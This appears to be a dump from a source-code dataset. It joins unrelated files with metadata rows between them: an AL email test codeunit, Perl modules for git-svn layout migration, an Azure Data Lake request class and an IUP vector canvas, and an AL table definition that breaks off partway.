ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When an error occurs on the subscriber it does not propagate up the stack and the notification is sent only once
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
EmailTest.ThrowErrorOnAfterSendEmail();
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsTrue(Status, 'The email should have been sent');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'Email outbox should have been deleted.');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
procedure ResendSentEmailFromAnotherUserTest()
var
SentEmail: Record "Sent Email";
Any: Codeunit Any;
EmailViewer: Codeunit "Email Viewer";
begin
// Create a sent email
PermissionsMock.Set('Email Edit');
SentEmail.Init();
SentEmail.Description := CopyStr(Any.UnicodeText(50), 1, MaxStrLen(SentEmail.Description));
SentEmail."Date Time Sent" := CurrentDateTime();
SentEmail."User Security Id" := CreateGuid(); // Created by another user
SentEmail.Insert();
asserterror EmailViewer.Resend(SentEmail);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
asserterror EmailViewer.EditAndSend(SentEmail);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
end;
[Test]
procedure GetSourceRecordInOutbox()
var
SourceEmailOutbox, EmailOutbox : Record "Email Outbox";
TempEmailOutbox: Record "Email Outbox" temporary;
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
MessageIds: List of [Guid];
SystemId: Guid;
TableId: Integer;
NumberOfEmails, i : Integer;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
EmailOutbox.DeleteAll();
// [Scenario] For emails with a source document, the GetEmailOutboxForRecord procedure returns the related Outbox Emails
// [Given] Source Record - Email Outbox used as a source record for test email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, SourceEmailOutbox);
TableId := Database::"Email Outbox";
SystemId := SourceEmailOutbox.SystemId;
// [When] Several emails are created and saved as draft
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
Clear(EmailOutbox);
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
MessageIds.Add(EmailMessage.GetId());
end;
// [Then] The GetEmailOutboxForRecord procedure returns the related Email Outbox records
Email.GetEmailOutboxForRecord(SourceEmailOutbox, TempEmailOutbox);
Assert.AreEqual(NumberOfEmails, TempEmailOutbox.Count(), 'Email Outbox count is not equal to Number of Emails created.');
for i := 1 to NumberOfEmails do begin
TempEmailOutbox.SetCurrentKey("Message Id");
TempEmailOutbox.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempEmailOutbox.Count(), 'Did not find the email in Email Outbox');
end;
end;
[Test]
procedure GetEmailOutboxRecordStatus()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
EmailStatus: Enum "Email Status";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
// [Scenario] For emails with a source document, GetOutboxEmailRecordStatus returns the status of the Outbox Email
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] The email is created with the source record
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [And] The email is saved as draft
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [Then] Email Status of created Email Outbox record is equal to GetOutboxEmailRecordStatus result
EmailStatus := Email.GetOutboxEmailRecordStatus(EmailOutbox."Message Id");
Assert.AreEqual(EmailStatus, EmailOutbox.Status, 'Email Status should be the same as on Email Outbox record');
end;
[Test]
procedure GetSentEmailsForRecordByVariant()
var
SentEmail: Record "Sent Email";
TempSentEmail: Record "Sent Email" temporary;
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Any: Codeunit Any;
SystemId: Guid;
TableId, NumberOfEmails, i : Integer;
MessageIds: List of [Guid];
begin
// [Scenario] When successfully sending an email with source, GetSentEmailsForRecord returns the related Sent Emails.
PermissionsMock.Set('Email Edit');
SentEmail.DeleteAll();
// [Given] An email with source and an email account
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
TableId := Database::"Email Account";
SystemId := EmailAccount.SystemId;
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
MessageIds.Add(EmailMessage.GetId());
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
end;
// [Then] The GetSentEmailsForRecord procedure returns the related Sent Email records
Email.GetSentEmailsForRecord(EmailAccount, TempSentEmail);
Assert.AreEqual(NumberOfEmails, TempSentEmail.Count(), 'Sent Emails count is not equal to Number of Emails sent.');
for i := 1 to NumberOfEmails do begin
TempSentEmail.SetCurrentKey("Message Id");
TempSentEmail.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempSentEmail.Count(), 'Did not find the email in Sent Emails ');
end;
end;
local procedure CreateEmail(var EmailMessage: Codeunit "Email Message")
var
Any: Codeunit Any;
begin
EmailMessage.Create(Any.Email(), Any.UnicodeText(50), Any.UnicodeText(250), true);
end;
local procedure CreateEmailWithSource(var EmailMessage: Codeunit "Email Message"; TableId: Integer; SystemId: Guid)
var
Any: Codeunit Any;
begin
EmailMessage.Create(Any.Email(), Any.UnicodeText(50), Any.UnicodeText(250), true);
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
end;
[StrMenuHandler]
[Scope('OnPrem')]
procedure CloseEmailEditorHandler(Options: Text[1024]; var Choice: Integer; Instruction: Text[1024])
begin
Choice := 1;
end;
[StrMenuHandler]
[Scope('OnPrem')]
procedure OnEmailEditorClose(Options: Text[1024]; var Choice: Integer; Instruction: Text[1024])
begin
Assert.AreEqual(InstructionTxt, Instruction, 'Wrong message when closing email editor');
Assert.AreEqual(OptionsOnClosePageTxt, Options, 'Wrong options when closing the email editor');
Choice := OptionChoice;
end;
[ModalPageHandler]
procedure RelationPickerHandler(var EmailRelationPickerTestPage: TestPage "Email Relation Picker")
begin
Assert.AreEqual(EmailRelationPickerTestPage."Relation Type".Value(), 'Primary Source', 'No source found on email relation picker page');
ClearLastError();
EmailRelationPickerTestPage."Source Name".Lookup();
Assert.AreEqual('', GetLastErrorText, 'An error occurred - opening email relation from picker');
end;
[ModalPageHandler]
procedure RelatedAttachmentsHandler(var RelatedAttachmentsPage: TestPage "Email Related Attachments")
var
SourceLabel: Variant;
begin
RelatedAttachmentsPage.First();
DequeueVariable(SourceLabel);
Assert.AreEqual('Attachment1', RelatedAttachmentsPage.FileName.Value(), 'Wrong Attachment');
Assert.AreEqual(SourceLabel, RelatedAttachmentsPage.Source.Value(), 'Wrong Attachment');
RelatedAttachmentsPage.OK().Invoke();
end;
[ModalPageHandler]
procedure EmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
Assert.IsTrue(EmailEditor.Account.Enabled(), 'Account field was not enabled');
Assert.IsTrue(EmailEditor.ToField.Editable(), 'To field was not editable');
Assert.IsTrue(EmailEditor.CcField.Editable(), 'Cc field was not editable');
Assert.IsTrue(EmailEditor.BccField.Editable(), 'Bcc field was not editable');
Assert.IsTrue(EmailEditor.SubjectField.Editable(), 'Subject field was not editable');
Assert.IsTrue(EmailEditor.BodyField.Editable(), 'Body field was not editable');
#if not CLEAN19
Assert.IsTrue(EmailEditor.Upload.Enabled(), 'Upload Action was not enabled.');
#else
Assert.IsTrue(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is not visible.');
#endif
Assert.IsTrue(EmailEditor.Send.Enabled(), 'Send Action was not enabled.');
end;
[ModalPageHandler]
procedure SendEmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
EmailEditorHandler(EmailEditor);
EmailEditor.Send.Invoke();
end;
[ModalPageHandler]
procedure DiscardEmailEditorHandler(var EmailEditor: TestPage "Email Editor")
begin
EmailEditorHandler(EmailEditor);
EmailEditor.Discard.Invoke();
end;
[ConfirmHandler]
procedure ConfirmYes(Question: Text[1024]; var Reply: Boolean);
begin
Assert.AreEqual(DiscardEmailQst, Question, 'Wrong confirmation question');
Reply := true;
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnAfterSendEmail', '', true, true)]
local procedure OnAfterSendEmailSubscriber(MessageId: Guid; Status: Boolean)
begin
VariableStorage.Enqueue(MessageId);
VariableStorage.Enqueue(Status);
if ThrowError then
Error('');
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnShowSource', '', true, true)]
local procedure OnShowSourceSubscriber(SourceTableId: Integer; SourceSystemId: Guid; var IsHandled: Boolean)
begin
IsHandled := true;
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnFindRelatedAttachments', '', true, true)]
local procedure OnFindRelatedAttachments(SourceTableId: Integer; SourceSystemID: Guid; var EmailRelatedAttachments: Record "Email Related Attachment")
var
Any: Codeunit Any;
begin
EmailRelatedAttachments."Attachment Name" := 'Attachment1';
EmailRelatedAttachments."Attachment Table ID" := Any.IntegerInRange(1000);
EmailRelatedAttachments."Attachment System ID" := System.CreateGuid();
EmailRelatedAttachments.Insert();
end;
[EventSubscriber(ObjectType::Codeunit, Codeunit::Email, 'OnGetAttachment', '', true, true)]
local procedure OnGetAttachment(AttachmentTableID: Integer; AttachmentSystemID: Guid; MessageID: Guid)
var
EmailMessage: Codeunit "Email Message";
begin
EmailMessage.Get(MessageID);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
end;
procedure ThrowErrorOnAfterSendEmail()
begin
ThrowError := true;
end;
procedure DequeueVariable(var Variable: Variant)
begin
VariableStorage.Dequeue(Variable);
end;
procedure AssertVariableStorageEmpty()
begin
VariableStorage.AssertEmpty();
end;
var
VariableStorage: Codeunit "Library - Variable Storage";
InstructionTxt: Label 'The email has not been sent.';
OptionsOnClosePageTxt: Label 'Keep as draft in Email Outbox,Discard email';
DiscardEmailQst: Label 'Go ahead and discard?';
OptionChoice: Integer;
ThrowError: Boolean;
} | 43.057605 | 297 | 0.675711 |
ed96ac593e8098fcdf93a8a7b9639ae1a2734c73 | 8,196 | pm | Perl | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | null | null | null | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | 5 | 2021-03-11T07:45:51.000Z | 2022-02-14T01:26:11.000Z | Windows/prompt/cmder/vendor/git-for-windows/mingw64/share/perl5/Git/SVN/Migration.pm | Brunohdp/Alura-Extras | 362e3ba6eeb31a3a34d182c8190b29733875bd3e | [
"MIT"
] | 4 | 2021-12-01T19:21:28.000Z | 2021-12-16T12:12:20.000Z | package Git::SVN::Migration;
# these version numbers do NOT correspond to actual version numbers
# of git or git-svn. They are just relative.
#
# v0 layout: .git/$id/info/url, refs/heads/$id-HEAD
#
# v1 layout: .git/$id/info/url, refs/remotes/$id
#
# v2 layout: .git/svn/$id/info/url, refs/remotes/$id
#
# v3 layout: .git/svn/$id, refs/remotes/$id
# - info/url may remain for backwards compatibility
# - this is what we migrate up to this layout automatically,
# - this will be used by git svn init on single branches
# v3.1 layout (auto migrated):
# - .rev_db => .rev_db.$UUID, .rev_db will remain as a symlink
# for backwards compatibility
#
# v4 layout: .git/svn/$repo_id/$id, refs/remotes/$repo_id/$id
# - this is only created for newly multi-init-ed
# repositories. Similar in spirit to the
# --use-separate-remotes option in git-clone (now default)
# - we do not automatically migrate to this (following
# the example set by core git)
#
# v5 layout: .rev_db.$UUID => .rev_map.$UUID
# - newer, more-efficient format that uses 24-bytes per record
# with no filler space.
# - use xxd -c24 < .rev_map.$UUID to view and debug
# - This is a one-way migration, repositories updated to the
# new format will not be able to use old git-svn without
# rebuilding the .rev_db. Rebuilding the rev_db is not
# possible if noMetadata or useSvmProps are set; but should
# be no problem for users that use the (sensible) defaults.
use strict;
use warnings $ENV{GIT_PERL_FATAL_WARNINGS} ? qw(FATAL all) : ();
use Carp qw/croak/;
use File::Path qw/mkpath/;
use File::Basename qw/dirname basename/;
our $_minimize;
use Git qw(
command
command_noisy
command_output_pipe
command_close_pipe
command_oneline
);
use Git::SVN;
sub migrate_from_v0 {
my $git_dir = $ENV{GIT_DIR};
return undef unless -d $git_dir;
my ($fh, $ctx) = command_output_pipe(qw/rev-parse --symbolic --all/);
my $migrated = 0;
while (<$fh>) {
chomp;
my ($id, $orig_ref) = ($_, $_);
next unless $id =~ s#^refs/heads/(.+)-HEAD$#$1#;
my $info_url = command_oneline(qw(rev-parse --git-path),
"$id/info/url");
next unless -f $info_url;
my $new_ref = "refs/remotes/$id";
if (::verify_ref("$new_ref^0")) {
print STDERR "W: $orig_ref is probably an old ",
"branch used by an ancient version of ",
"git-svn.\n",
"However, $new_ref also exists.\n",
"We will not be able ",
"to use this branch until this ",
"ambiguity is resolved.\n";
next;
}
print STDERR "Migrating from v0 layout...\n" if !$migrated;
print STDERR "Renaming ref: $orig_ref => $new_ref\n";
command_noisy('update-ref', $new_ref, $orig_ref);
command_noisy('update-ref', '-d', $orig_ref, $orig_ref);
$migrated++;
}
command_close_pipe($fh, $ctx);
print STDERR "Done migrating from v0 layout...\n" if $migrated;
$migrated;
}
sub migrate_from_v1 {
my $git_dir = $ENV{GIT_DIR};
my $migrated = 0;
return $migrated unless -d $git_dir;
my $svn_dir = Git::SVN::svn_dir();
# just in case somebody used 'svn' as their $id at some point...
return $migrated if -d $svn_dir && ! -f "$svn_dir/info/url";
print STDERR "Migrating from a git-svn v1 layout...\n";
mkpath([$svn_dir]);
print STDERR "Data from a previous version of git-svn exists, but\n\t",
"$svn_dir\n\t(required for this version ",
"($::VERSION) of git-svn) does not exist.\n";
my ($fh, $ctx) = command_output_pipe(qw/rev-parse --symbolic --all/);
while (<$fh>) {
my $x = $_;
next unless $x =~ s#^refs/remotes/##;
chomp $x;
my $info_url = command_oneline(qw(rev-parse --git-path),
"$x/info/url");
next unless -f $info_url;
my $u = eval { ::file_to_s($info_url) };
next unless $u;
my $dn = dirname("$svn_dir/$x");
mkpath([$dn]) unless -d $dn;
if ($x eq 'svn') { # they used 'svn' as GIT_SVN_ID:
mkpath(["$svn_dir/svn"]);
print STDERR " - $git_dir/$x/info => ",
"$svn_dir/$x/info\n";
rename "$git_dir/$x/info", "$svn_dir/$x/info" or
croak "$!: $x";
# don't worry too much about these, they probably
# don't exist with repos this old (save for index,
# and we can easily regenerate that)
foreach my $f (qw/unhandled.log index .rev_db/) {
rename "$git_dir/$x/$f", "$svn_dir/$x/$f";
}
} else {
print STDERR " - $git_dir/$x => $svn_dir/$x\n";
rename "$git_dir/$x", "$svn_dir/$x" or croak "$!: $x";
}
$migrated++;
}
command_close_pipe($fh, $ctx);
print STDERR "Done migrating from a git-svn v1 layout\n";
$migrated;
}
sub read_old_urls {
my ($l_map, $pfx, $path) = @_;
my @dir;
foreach (<$path/*>) {
if (-r "$_/info/url") {
$pfx .= '/' if $pfx && $pfx !~ m!/$!;
my $ref_id = $pfx . basename $_;
my $url = ::file_to_s("$_/info/url");
$l_map->{$ref_id} = $url;
} elsif (-d $_) {
push @dir, $_;
}
}
my $svn_dir = Git::SVN::svn_dir();
foreach (@dir) {
my $x = $_;
$x =~ s!^\Q$svn_dir\E/!!o;
read_old_urls($l_map, $x, $_);
}
}
sub migrate_from_v2 {
my @cfg = command(qw/config -l/);
return if grep /^svn-remote\..+\.url=/, @cfg;
my %l_map;
read_old_urls(\%l_map, '', Git::SVN::svn_dir());
my $migrated = 0;
require Git::SVN;
foreach my $ref_id (sort keys %l_map) {
eval { Git::SVN->init($l_map{$ref_id}, '', undef, $ref_id) };
if ($@) {
Git::SVN->init($l_map{$ref_id}, '', $ref_id, $ref_id);
}
$migrated++;
}
$migrated;
}
sub minimize_connections {
require Git::SVN;
require Git::SVN::Ra;
my $r = Git::SVN::read_all_remotes();
my $new_urls = {};
my $root_repos = {};
foreach my $repo_id (keys %$r) {
my $url = $r->{$repo_id}->{url} or next;
my $fetch = $r->{$repo_id}->{fetch} or next;
my $ra = Git::SVN::Ra->new($url);
# skip existing cases where we already connect to the root
if (($ra->url eq $ra->{repos_root}) ||
($ra->{repos_root} eq $repo_id)) {
$root_repos->{$ra->url} = $repo_id;
next;
}
my $root_ra = Git::SVN::Ra->new($ra->{repos_root});
my $root_path = $ra->url;
$root_path =~ s#^\Q$ra->{repos_root}\E(/|$)##;
foreach my $path (keys %$fetch) {
my $ref_id = $fetch->{$path};
my $gs = Git::SVN->new($ref_id, $repo_id, $path);
# make sure we can read when connecting to
# a higher level of a repository
my ($last_rev, undef) = $gs->last_rev_commit;
if (!defined $last_rev) {
$last_rev = eval {
$root_ra->get_latest_revnum;
};
next if $@;
}
my $new = $root_path;
$new .= length $path ? "/$path" : '';
eval {
$root_ra->get_log([$new], $last_rev, $last_rev,
0, 0, 1, sub { });
};
next if $@;
$new_urls->{$ra->{repos_root}}->{$new} =
{ ref_id => $ref_id,
old_repo_id => $repo_id,
old_path => $path };
}
}
my @emptied;
foreach my $url (keys %$new_urls) {
# see if we can re-use an existing [svn-remote "repo_id"]
# instead of creating a(n ugly) new section:
my $repo_id = $root_repos->{$url} || $url;
my $fetch = $new_urls->{$url};
foreach my $path (keys %$fetch) {
my $x = $fetch->{$path};
Git::SVN->init($url, $path, $repo_id, $x->{ref_id});
my $pfx = "svn-remote.$x->{old_repo_id}";
my $old_fetch = quotemeta("$x->{old_path}:".
"$x->{ref_id}");
command_noisy(qw/config --unset/,
"$pfx.fetch", '^'. $old_fetch . '$');
delete $r->{$x->{old_repo_id}}->
{fetch}->{$x->{old_path}};
if (!keys %{$r->{$x->{old_repo_id}}->{fetch}}) {
command_noisy(qw/config --unset/,
"$pfx.url");
push @emptied, $x->{old_repo_id}
}
}
}
if (@emptied) {
my $file = $ENV{GIT_CONFIG} ||
command_oneline(qw(rev-parse --git-path config));
print STDERR <<EOF;
The following [svn-remote] sections in your config file ($file) are empty
and can be safely removed:
EOF
print STDERR "[svn-remote \"$_\"]\n" foreach @emptied;
}
}
sub migration_check {
migrate_from_v0();
migrate_from_v1();
migrate_from_v2();
minimize_connections() if $_minimize;
}
1;
| 30.81203 | 73 | 0.592484 |
ed78b9f95b36aaf25f5a8e239ff63f2224df6aca | 1,036 | pm | Perl | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/DataLakeAnalyticsData/GetPackageCatalog.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | 1 | 2021-04-08T15:26:39.000Z | 2021-04-08T15:26:39.000Z | package Azure::DataLakeAnalyticsData::GetPackageCatalog;
use Moose;
use MooseX::ClassAttribute;
has 'api_version' => (is => 'ro', required => 1, isa => 'Str', default => '2016-11-01',
traits => [ 'Azure::ParamInQuery', 'Azure::LocationInResponse' ], location => 'api-version',
);
has 'databaseName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
has 'packageName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
has 'schemaName' => (is => 'ro', required => 1, isa => 'Str',
traits => [ 'Azure::ParamInPath' ],
);
class_has _api_uri => (is => 'ro', default => '/catalog/usql/databases/{databaseName}/schemas/{schemaName}/packages/{packageName}');
class_has _returns => (is => 'ro', isa => 'HashRef', default => sub { {
200 => 'Azure::DataLakeAnalyticsData::GetPackageCatalogResult',
} });
class_has _is_async => (is => 'ro', default => 0);
class_has _api_method => (is => 'ro', default => 'GET');
1;
| 38.37037 | 134 | 0.590734 |
eda9fdb2a4e6cad9eebc7c46c22243627e26f6bd | 6,429 | pm | Perl | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 5 | 2015-02-10T02:29:10.000Z | 2020-02-24T18:39:15.000Z | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 3 | 2015-04-03T11:55:20.000Z | 2021-03-06T15:27:56.000Z | lib/IUP/Canvas/FileVector.pm | kmx/perl-iup | 0178f76a39f01f750e1406f01c3c2d84a3a48ea9 | [
"MIT",
"Unlicense"
] | 2 | 2015-02-06T00:30:28.000Z | 2015-06-15T21:33:56.000Z | package IUP::Canvas::FileVector;
use strict;
use warnings;
use base qw(IUP::Internal::Canvas);
use IUP::Internal::LibraryIup;
use Carp;
sub new {
my ($class, %args) = @_;
my $format = $args{format};
my $filename = $args{filename};
my $width = $args{width};
my $height = $args{height};
my $resolution = $args{resolution};
my $dpi = $args{dpi};
my $ch;
if (!$filename) {
carp "warning: filename parameter not defined for ".__PACKAGE__."->new()";
}
elsif (!$format) {
carp "warning: format parameter not defined for ".__PACKAGE__."->new()";
}
elsif (defined $width && $width<0) {
carp "warning: width parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif (defined $height && $height<0) {
carp "warning: height parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif ((defined $width && !defined $height) || (!defined $width && defined $height)) {
carp "warning: none or both height and width parameters have to be defined for ".__PACKAGE__."->new()";
}
elsif (defined $dpi && defined $resolution) {
carp "warning: you cannot define both 'resolution' and 'dpi' parameters for ".__PACKAGE__."->new()";
}
elsif (defined $resolution && $resolution<0) {
carp "warning: resolution parameter is '<=0' for ".__PACKAGE__."->new()";
}
elsif (defined $dpi && $dpi<0) {
carp "warning: dpi parameter is '<=0' for ".__PACKAGE__."->new()";
}
else {
my $init;
$resolution = $dpi/25.4 if defined $dpi;
if ($format eq 'PS') { # http://www.tecgraf.puc-rio.br/cd/en/drv/ps.html
# "filename -p[paper] -w[width] -h[height] -l[left] -r[right] -b[bottom] -t[top] -s[resolution] [-e] [-g] [-o] [-1] -d[margin]"
# "%s -p%d -w%g -h%g -l%g -r%g -b%g -t%g -s%d -e -o -1 -g -d%g"
$init = $filename;
$init .= sprintf(" -w%g -h%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" -p%d", $args{paper}) if defined $args{paper};
$init .= sprintf(" -l%g", $args{left}) if defined $args{left};
$init .= sprintf(" -r%g", $args{right}) if defined $args{right};
$init .= sprintf(" -b%g", $args{top}) if defined $args{top};
$init .= sprintf(" -t%g", $args{bottom}) if defined $args{bottom};
$init .= sprintf(" -d%g", $args{margin}) if defined $args{margin};
$init .= sprintf(" -s%d", $resolution) if defined $resolution;
$init .= " -1" if defined $args{level1};
$init .= " -g" if defined $args{debug};
$init .= " -e" if defined $args{eps};
$init .= " -o" if defined $args{landscape};
}
elsif ($format eq 'SVG') { # http://www.tecgraf.puc-rio.br/cd/en/drv/svg.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'CGM') { # http://www.tecgraf.puc-rio.br/cd/en/drv/cgm.html
# "filename [widthxheight] [resolution] [-t] -p[precision]"
# "%s %gx%g %g %s"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
$init .= " -t" if defined $args{codification};
$init .= sprintf(" -p%d", $args{precision}) if defined $args{precision};
}
elsif ($format eq 'DEBUG') { # http://www.tecgraf.puc-rio.br/cd/en/drv/debug.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'DGN') { # http://www.tecgraf.puc-rio.br/cd/en/drv/dgn.html
# "filename [widthxheight] [resolution] [-f] [-sseedfile]"
# "%s %gx%g %g %s"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
$init .= " -f" if defined $args{filling};
$init .= sprintf(" -s%s", $args{seedfile}) if defined $args{seedfile};
}
elsif ($format eq 'DXF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/dxf.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'EMF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/emf.html
# "filename widthxheight"
# "%s %dx%d"
if (defined $width && defined $height) { #widthxheight - mandatory
$init = $filename;
$init .= sprintf(" %dx%d", $width, $height) if defined $width && defined $height;
}
else {
$init = '';
carp "warning: width and height are mandatory for format=>'EMF'";
}
}
elsif ($format eq 'METAFILE') { # http://www.tecgraf.puc-rio.br/cd/en/drv/mf.html
# "filename [widthxheight] [resolution]"
# "%s %gx%g %g"
$init = $filename;
$init .= sprintf(" %gx%g", $width, $height) if defined $width && defined $height;
$init .= sprintf(" %g", $resolution) if defined $resolution;
}
elsif ($format eq 'WMF') { # http://www.tecgraf.puc-rio.br/cd/en/drv/wmf.html
# "filename widthxheight [resolution]"
# "%s %dx%d %g"
if (defined $width && defined $height) { #widthxheight - mandatory
$init = $filename;
$init .= sprintf(" %dx%d", $width, $height) if defined $width && defined $height;
}
else {
$init = '';
carp "warning: width and height are mandatory for format=>'WMF'";
}
}
if (defined $init) {
if ($init ne '') {
$init .= " $args{raw}" if defined $args{raw};
#warn "XXX-DEBUG: type='$format' init='$init'\n";
$ch = $class->new_from_cnvhandle(IUP::Internal::Canvas::_cdCreateCanvas_BASIC($format, $init));
}
}
else {
carp "warning: unsupported format '$format' in ".__PACKAGE__."->new()";
}
}
return $ch;
}
1;
| 43.734694 | 135 | 0.552808 |
edae247cdd52280e75542b113fb62c3090d1604a | 1,946 | al | Perl | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 1 | 2021-08-16T18:14:49.000Z | 2021-08-16T18:14:49.000Z | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 3 | 2020-06-24T12:59:52.000Z | 2020-06-24T14:51:04.000Z | AddOns/DynamicsGPDataMigrationV2/app/src/History/Tab4129.GP_IVTrxDetailHist.al | daansaveyn/ALAppExtensions | 882d4d0eadd2fb49c405b1c05baf282114339c77 | [
"MIT"
] | 1 | 2020-07-30T12:20:36.000Z | 2020-07-30T12:20:36.000Z | table 4129 "GP_IVTrxDetailHist"
{
ReplicateData = false;
fields
{
field(1; DOCTYPE; Option)
{
Caption = 'Document Type';
OptionMembers = ,"Adjustment","Variance","Transfer","Receipt","Return","Sale","Assembly","Standard Cost Adjustment","Cost Adjustment via PO Edit Status","Cost Adjustment via PO Return","Cost Adjustment via PO Invoice Match","Cost Adjustment via PO Landed Cost Match","Cost Adjustment via PO Tax";
DataClassification = CustomerContent;
}
field(2; DOCNUMBR; text[22])
{
Caption = 'Document Number';
DataClassification = CustomerContent;
}
field(3; LNSEQNBR; Decimal)
{
Caption = 'Line SEQ Number';
DataClassification = CustomerContent;
}
field(4; DTLSEQNM; Integer)
{
Caption = 'Detail SEQ Number';
DataClassification = CustomerContent;
}
field(5; QTYTYPE; Option)
{
Caption = 'QTY Type';
OptionMembers = ,"On Hand","Returned","In Use","In Service","Damaged";
DataClassification = CustomerContent;
}
field(6; RCPTNMBR; text[22])
{
Caption = 'Receipt Number';
DataClassification = CustomerContent;
}
field(7; RCPTQTY; Decimal)
{
Caption = 'Receipt QTY';
DataClassification = CustomerContent;
}
field(8; RCPTEXCT; Decimal)
{
Caption = 'Receipt Extended Cost';
DataClassification = CustomerContent;
}
field(9; DEX_ROW_ID; Integer)
{
Caption = 'DEX_ROW_ID';
DataClassification = CustomerContent;
}
}
keys
{
